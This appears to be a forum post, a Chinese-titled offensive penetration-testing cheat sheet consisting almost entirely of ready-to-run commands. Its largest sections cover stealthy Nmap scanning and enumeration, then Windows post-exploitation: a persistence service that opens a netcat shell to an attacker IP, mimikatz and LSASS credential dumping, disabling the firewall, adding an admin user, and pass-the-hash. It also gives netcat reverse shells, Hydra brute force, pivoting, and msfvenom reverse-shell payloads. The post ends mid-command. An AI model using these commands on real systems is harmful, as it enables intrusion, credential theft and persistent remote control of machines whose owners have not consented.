標題：滲透測試技巧大全

[taibeihacker]

Nmap Full Web Vulnerable Scan​

cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

Dirb Dir Bruteforce:​

dirb http://IPORT /usr/share/dirb/wordlists/common.txt

Nikto web server scanner​

nikto -C all -h http://ip

WordPress Scanner​

git clone https://github.com/wpscanteam/wpscan.git cd wpscan
./wpscan –url http://ip/–enumerate p

HTTP Fingerprinting​

wget http://www.net-square.com/_assets/httprint_linux_301.zip unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://ip -s signatures.txt

SKIP Fish Scanner​

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://ip

Nmap Ports Scan​

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
2)fargement
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5)nmap –source-port 53 target
nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)

NC Scanning​

nc -v -w 1 target -z 1-1000
for i in {101.102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan​

us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose

Xprobe2 OS fingerprinting​

xprobe2 -v -p tcp:80pen IP

Samba Enumeration​

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U '' target
enum4linux target

SNMP Enumeration​

snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Useful cmds​

net localgroup Users
net localgroup Administrators
search dir/s *.doc
system('start cmd.exe /k $cmd')
sc create microsoft_update binpath='cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe' start=auto error=ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe 'privilege:debug' 'log' 'sekurlsa:logonpasswords'
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe 'sekurlsa:minidump lsass.dmp' 'log' 'sekurlsa:logonpasswords'
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

PuTTY Link tunnel​

Forward remote port to local address
plink.exe -P 22 -l root -pw '1234' -R 445:127.0.0.1:445 IP

Meterpreter portfwd​

# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali rdesktop 127.0.0.1:3389

Enable RDP Access​

reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Turn Off Windows Firewall​

netsh firewall set opmode disable

Meterpreter VNC\RDP​

# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043

Add New user in Windows​

net user test 1234 /add
net localgroup administrators test /add

Mimikatz use​

git clone https://github.com/gentilkiwi/mimikatz.git
privilege:debug
sekurlsa:logonPasswords full

Passing the Hash​

git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
or
apt-get install freerdp-x11
xfreerdp /uffsec /d:win2012 /pth:HASH /v:IP
or
meterpreter run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:
msf use exploit/windows/smb/psexec
msf exploit(psexec) set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) exploit
meterpreter shell

Hashcat password cracking​

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat examples​

c: nc -l -p 31337
#nc 192.168.0.10 31337
c: nc -v -w 30 -p 31337 -l secret.txt
#nc -v -w 2 192.168.0.10 31337 secret.txt

Banner grabbing with NC​

nc 192.168.0.10 80
GET/HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
enter
enter

Window reverse shell​

c:nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:nc example.com 80 -e cmd.exe
nc -lp 80
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

Find SUID\SGID root files​

# Find SUID root files
find/-user root -perm -4000 -print
# Find SGID root files:
find/-group root -perm -2000 -print
# Find SUID and SGID files owned by anyone:
find/-perm -4000 -o -perm -2000 -print
# Find files that are not owned by any user:
find/-nouser -print
# Find files that are not owned by any group:
find/-nogroup -print
# Find symlinks and what they point to:
find/-type l -ls

Python shell​

python -c 'import pty;pty.spawn('/bin/bash')'

Python\Ruby\PHP HTTP Server​

python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e 'WEBrick:HTTPServer.newPort=8888,DocumentRoot=Dir.pwd).start'
php -S 0.0.0.0:8888

Get PIDs of process​

fuser -nv tcp 80
fuser -k -n tcp 80

Hydra rdp Bruteforce​

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp

Mount Remote Windows Share​

smbmount //X.X.X.X/c$ /mnt/remote/-o username=user,password=pass,rw

Compiling Exploit in Kali​

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Compiling Windows Exploits on Kali​

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

NASM Commands​

nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting​

ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target

SSH Pivoting from One Network to Another​

ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target

Pivoting Using metasploit​

route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
or
# https://www.offensive-security.com/metasploit-unleashed/pivoting/
meterpreter ipconfig
IP Address : 10.1.13.3
meterpreter run autoroute -s 10.1.13.0/24
meterpreter run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter Ctrl+Z
msf auxiliary(tcp) use exploit/windows/smb/psexec
msf exploit(psexec) set RHOST 10.1.13.2
msf exploit(psexec) exploit
meterpreter ipconfig
IP Address : 10.1.13.2

Exploit-DB search using CSV File​

git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit 'Linux Kernel'
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep '|=' | sort -k3

MSF Payloads​

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address X system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 R exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e x86/shikata_ga_nai -b '\x00' -a x86 --platform win -f c

MSF Linux Reverse Meterpreter Binary​

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP Address LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF Reverse Shell (C Shellcode)​

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b '\x00\x0a\x0d' -a x86 --platform win -f c

MSF Reverse Shell Python Script​

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF Reverse ASP Shell​

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Your IP Address LPORT=Your Port to Connect On -f asp -a x86 --platform win -o shell.asp

MSF Reverse Bash Shell​

msfvenom -p cmd/unix/reverse_bash LHOST=Your IP Address LPORT=Your Port to Conn